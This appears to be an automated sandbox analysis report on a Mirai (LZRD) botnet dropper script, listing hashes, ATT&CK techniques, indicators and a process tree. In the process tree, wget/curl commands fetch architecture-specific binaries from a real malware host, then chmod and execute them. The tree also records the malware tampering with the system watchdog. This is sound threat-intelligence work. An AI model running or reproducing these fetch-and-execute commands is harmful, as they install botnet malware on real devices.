mirai | 5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4

Analysis

max time kernel
137s
max time network
150s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
26-12-2024 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

7c5ed3803ed430d1f19ad74fda51642f
SHA1

43d7c9d2e6065acbc7b1440a6e9a60bee8db353b
SHA256

5bac9d684357a86485310dc0f98b63f0f9c0f08e7879c7812a0949ff882fe7c4
SHA512

ff126662eb0097a5554f95a4b91c71481213e45f3f5a98a426ce49c7f15f32b422b2864cd97588d6360014e01e971003cfe1c63e58bc1bfadc38a4d150561565

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
760	chmod
836	chmod
867	chmod
879	chmod
896	chmod
902	chmod
800	chmod
813	chmod
873	chmod
885	chmod
891	chmod
738	chmod
861	chmod
744	chmod
807	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	739	Chaotic
/tmp/Chaotic	745	Chaotic
/tmp/Chaotic	762	Chaotic
/tmp/Chaotic	802	Chaotic
/tmp/Chaotic	808	Chaotic
/tmp/Chaotic	814	Chaotic
/tmp/Chaotic	837	Chaotic
/tmp/Chaotic	862	Chaotic
/tmp/Chaotic	868	Chaotic
/tmp/Chaotic	874	Chaotic
/tmp/Chaotic	880	Chaotic
/tmp/Chaotic	886	Chaotic
/tmp/Chaotic	892	Chaotic
/tmp/Chaotic	897	Chaotic
/tmp/Chaotic	903	Chaotic

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Chaotic
File opened for modification	/bin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/223/status	Chaotic
File opened for reading	/proc/699/status	Chaotic
File opened for reading	/proc/834/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/70/status	Chaotic
File opened for reading	/proc/351/status	Chaotic
File opened for reading	/proc/686/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/79/status	Chaotic
File opened for reading	/proc/74/status	Chaotic
File opened for reading	/proc/11/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/75/status	Chaotic
File opened for reading	/proc/156/status	Chaotic
File opened for reading	/proc/352/status	Chaotic
File opened for reading	/proc/666/status	Chaotic
File opened for reading	/proc/5/status	Chaotic
File opened for reading	/proc/669/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/36/status	Chaotic
File opened for reading	/proc/705/status	Chaotic
File opened for reading	/proc/713/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/323/status	Chaotic
File opened for reading	/proc/383/status	Chaotic
File opened for reading	/proc/675/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/238/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/status	Chaotic
File opened for reading	/proc/676/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/72/status	Chaotic
File opened for reading	/proc/706/status	Chaotic
File opened for reading	/proc/73/status	Chaotic
File opened for reading	/proc/7/status	Chaotic
File opened for reading	/proc/8/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/24/status	Chaotic
File opened for reading	/proc/69/status	Chaotic
File opened for reading	/proc/71/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/837/status	Chaotic
File opened for reading	/proc/326/status	Chaotic
File opened for reading	/proc/4/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/784/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/10/status	Chaotic
File opened for reading	/proc/110/status	Chaotic
File opened for reading	/proc/325/status	Chaotic
File opened for reading	/proc/839/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/121/status	Chaotic
File opened for reading	/proc/378/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
805	curl
806	cat
810	wget
811	curl
812	cat
804	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:707
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:710
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:714
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:737
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:739
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:741
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:742
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:743
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:747
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:759
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:760
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:762
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:765
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:787
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:799
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:802
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:804
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:805
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:806
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:807
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:808
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:810
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:811
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:812
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:814
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:815
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:823
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:835
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-bfd316a2a8fb439f9c2b0a5f4e127d58-systemd-timedated.service-v7DNk6 ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:837
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:858
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:859
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:860
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:862
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:864
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:865
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:866
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:868
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:870
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:871
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:872
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:873
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:874
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:876
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:877
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:878
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:879
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:880
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:882
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:884
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:886
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:890
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:892
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:893
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:894
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:895
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:896
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:897
- /usr/bin/wget
  wget http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:899
- /usr/bin/curl
  curl -O http://92.118.56.167/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:900
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:901
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:903

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
cab2fc62b63f28cd95c3fdca9ecec6d0

SHA1
df33b92944b8436e7310b0a03ca9038b70c65a56

SHA256
8436a21f6e581d533cc9d3f9b292c89aa171b6c8f560f3baf666b00556b60871

SHA512
dd2bdb170092fc31e19e072f4b637ccff00a26ca59ddb4e02f01ff189d382c8f0b267eafd3b508ee9fffb076ac8204e2453a6769f7bb2a25b40fd043dd7d2224

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
8c12d2392db8546a0f1a870c8d8da4bb

SHA1
41857b0229bb9533a6e9949b30b593504ab05404

SHA256
c161ac5c4cf291df85f5aa76370cce82b05a99901821ef294052ab788e1e4479

SHA512
6c47d0d9c80681443b8fab1490ab9eb7081a5aa3242b26dc7e38789a1e8d8825b32b0e95209de17df338f15a6900e9d39e906005e9dc660f86292944209a3323

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
a1f76b42767974d8df0e46ae67cabd0f

SHA1
f8e929ce4a60ea8e8d471264d4ffbb1b3717d638

SHA256
7572e4b384752ae36079a75cf137b1a3599dd0ff1f31cb3a986926bb230cd8fb

SHA512
884f247c390aa06c023c7e398bf0ff80945371ad21683eee41c264b79f2cd5ff26b7dafb39fb85911c12b5b5310b702ef80b3933a1f35c0a3ad8b5b272541043

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
64fa0599b70a18403044c5ead883bb4a

SHA1
a36e9a7e4989cacce45ab21473fc96f450d1585a

SHA256
036a4c6d7e77446c407820f59b351b834aa4cb0c7d3075aed5830474bc355f90

SHA512
5b8738b611cf774d494dec0703e19c5fc54a246eb27e08c6f7a1a1be72aeccd5ee8bdb6916c0676a3bc6625954a91a6f02441ecc2903d7d5a5db072d2f323b85

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
bfa8c14219c81fedb6df65b1e34bf0cd

SHA1
44296a9b7a6c6169957746fcfeef10903d89c6c6

SHA256
09c681ef2234341e1ba972412d929cd4a4c1c0b5f486b7543008157a0efa7ecc

SHA512
8783c57a78de7d6a66644aa6ba895ae97b0b1825a0cab6a1741c2ed6f9b8226cbf7eb08e5ead6d7543320be1f3847ef1f98bdcb8f11e9c67d1ee17523d45ec0c

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
252405874b163d27f4b275dfdc52df3f

SHA1
7b854e1e3cbf34c4833e9efe5213596a5922e3a7

SHA256
d90c92338314e3a2dcc1beba3fe072b3b0223191753c6c368c0f87ee0f6a8e0b

SHA512
3f995f611199a8de9caa0e84072afaed4a8b70e204002edd5e306daec31ce6f8ae4af68232b0fb9bf64eef4e62a13695af91fe716460ba8f4119766d31193081

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads